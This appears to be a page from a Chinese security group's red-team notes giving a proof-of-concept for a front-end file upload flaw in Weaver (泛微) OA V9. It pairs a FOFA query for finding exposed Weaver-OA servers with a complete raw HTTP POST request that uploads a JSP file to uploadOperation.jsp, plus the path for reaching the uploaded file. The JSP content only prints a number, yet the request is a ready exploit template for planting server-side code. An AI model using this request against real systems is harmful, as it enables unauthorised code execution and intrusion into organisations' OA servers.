menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right zlsec chevron_right zlsec_info chevron_right document chevron_right 2021_Hvv chevron_right 泛微OAV9 前台文件上传.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    泛微OAV9 前台文件上传.md
    617 B / 2021-04-15 00:03:20
        ### 描述
fofa app="Weaver-OA"

### POC & 利用
```

POST /page/exportImport/uploadOperation.jsp HTTP/1.1
Host: x.x.x.x
Content-Length: 216
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x/
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFy3iNVBftjP6IOwo
Connection: close

------WebKitFormBoundaryFy3iNVBftjP6IOwo
Content-Disposition: form-data; name="file"; filename="12.jsp"
Content-Type: application/octet-stream

<%out.print(1111);%>
------WebKitFormBoundaryFy3iNVBftjP6IOwo--
```

### 然后访问
`page/exportImport/fileTransfer/12.jsp`
    links
    file_download